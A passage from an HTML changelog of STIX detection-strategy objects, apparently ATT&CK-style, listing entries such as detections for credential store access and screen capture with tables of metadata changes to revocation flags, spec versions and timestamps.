collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0159] Detect Remote Access via USB Hardware (TinyPilot, PiKVM)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0048] Detect Remote Email Collection via Abnormal Login and Programmatic Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0346] Detect Screen Capture via Commands and API Calls</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0154] Detect Screensaver-Based Persistence via Registry and Execution Chains</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0020] Detect Shell Configuration Modification for Persistence via Event-Triggered Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0899] Detect Social Engineering</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16T16:45:43.694Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 16:45:43.694000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:22:37.160Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0452] Detect Subversion of Trust Controls via Certificate, Registry, and Attribute Manipulation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0037] Detect Suspicious Access to Browser Credential Stores</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0549] Detect Suspicious Access to Private Key Files and Export Attempts Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0134] Detect Suspicious Access to Windows Credential Manager</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0057] Detect Suspicious Access to securityd Memory for Credential Extraction</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0230] Detect Suspicious or Malicious Code Signing Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0141] Detect Time-Based Evasion via Sleep, Timer Loops, and Delayed Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0130] Detect Unauthorized Access to Cloud Secrets Management Stores</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0597] Detect Unauthorized Access to Password Managers</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0111] 